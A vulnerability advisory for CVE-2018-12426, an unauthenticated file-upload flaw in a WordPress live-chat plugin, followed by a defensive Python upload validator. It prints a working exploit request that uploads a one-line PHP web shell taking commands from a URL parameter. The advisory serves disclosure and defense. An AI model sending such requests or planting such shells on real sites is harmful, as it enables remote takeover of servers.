CVE-2018-12426
[Suggested description]
The WP Live Chat Support PRO plugin before 8.0.07 for WordPress is
vulnerable to unauthenticated Remote Code Execution because the allowed
file types are validated only on the client side, as demonstrated by a
v1/remote_upload request with a .php filename and an image/jpeg
content type.
[Additional Information]
The following request (multipart boundary abbreviated) was used to upload a PHP web shell to the server:
POST /wp-json/wp_live_chat_support/v1/remote_upload HTTP/1.1
Host: localhost:8000
Cookie: wp-settings-1=mfold%3Do%26imgsize%3Dfull%26libraryContent%3Dbrowse; wp-settings-time-1=1523622040; wplc_chat_status=5;
... 7109443162421071041760069510
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: image/jpeg
<?php echo system($_GET["CMD"]); ?>
... 7109443162421071041760069510
Content-Disposition: form-data; name="timestamp"
1528969272366
... 7109443162421071041760069510--
The response returns the URL under which the uploaded file was stored; because it sits inside the web-accessible uploads directory, the .php file can be requested (and executed) directly:
HTTP/1.1 200 OK
{"response":"http:\/\/localhost:8000\/wp-content\/uploads\/wp_live_chat\/\/pwn.php"}
[Vulnerability Type]
Insecure file-upload / Remote code execution
[Vendor of Product]
CodeCabin_ / WP-livechat
[Affected Product Code Base]
WP live chat support - PRO - All versions < 8.0.07
[Affected Component]
WP live chat support PRO - all versions < 8.0.07
[Attack Type]
Remote
[Impact Code execution]
true
[Attack Vectors]
The affected versions of WP Live Chat Support PRO allow
unauthenticated visitors to upload files through the chat window. The
allowed file types (extensions) are enforced only by client-side
constraints; the REST endpoint that performs the upload
(/wp-json/wp_live_chat_support/v1/remote_upload) does not re-validate
the filename or the content on the server. An attacker who submits a
POST request directly to that endpoint bypasses the client-side
constraints and can upload arbitrary files, including PHP scripts, into
the web-accessible uploads directory of the target server.
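As an added example of the server-side check the endpoint lacked (this is not the vendor's 8.0.07 fix and not the plugin's code), validate_upload() below applies the checks a practitioner would expect before storing a chat attachment: strip any path component, refuse anything the web server could hand to the PHP interpreter regardless of where in the name it appears, require the extension to be on an allowlist, require the client-declared Content-Type to agree with that extension, sniff the leading bytes so the content matches too, and store the file under a server-generated name. The allowlist and the magic-byte table are assumptions chosen for the example.

```python
import os
import re
import secrets

# Allowlist of types a chat widget legitimately needs to accept. The set,
# and the magic bytes used to sniff them, are assumptions for this example,
# not the plugin's own list.
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif", (b"GIF87a", b"GIF89a")),
    "pdf":  ("application/pdf", (b"%PDF-",)),
}

# Anything the web server might hand to the PHP interpreter, matched anywhere
# in the name (shell.php.jpg is executed as PHP on Apache configurations that
# use AddHandler), not only as the final extension.
EXECUTABLE = re.compile(r"\.(php\d?|phtml|phar|phps|pht|shtml|htaccess)(\.|$)", re.IGNORECASE)


def sanitize_name(filename):
    """Drop any directory component the client sent and reject control bytes."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name or name in (".", ".."):
        raise ValueError("bad filename")
    return name


def validate_upload(filename, declared_type, data):
    """Server-side checks the vulnerable endpoint lacked.

    Returns (True, server_filename) when the upload may be stored, or
    (False, reason). The stored name is server-generated: the client's
    filename is used only to pick an allowlisted extension.
    """
    try:
        name = sanitize_name(filename)
    except ValueError as e:
        return False, str(e)
    if EXECUTABLE.search(name):
        return False, "executable extension"
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return False, "extension not allowed"
    expected_mime, magics = ALLOWED[ext]
    # The Content-Type part header is client-controlled; it must agree with
    # the extension, but on its own it proves nothing.
    if declared_type.split(";", 1)[0].strip().lower() != expected_mime:
        return False, "declared type does not match extension"
    # Check what the bytes actually are, not what the client says they are.
    if not any(data.startswith(m) for m in magics):
        return False, "content does not match extension"
    return True, f"{secrets.token_hex(16)}.{ext}"
```

The advisory's request (pwn.php, image/jpeg, PHP bytes) fails the first check, and the same bytes under a .jpg name fail the magic-byte check. Sniffing leading bytes does not defeat a JPEG/PHP polyglot, which is why the file must never be stored under the client's name and the uploads directory should additionally have script execution disabled (or live outside the web root); the point of the example is that every decision is made from what the server can verify, not from the multipart headers the client wrote.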
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-12426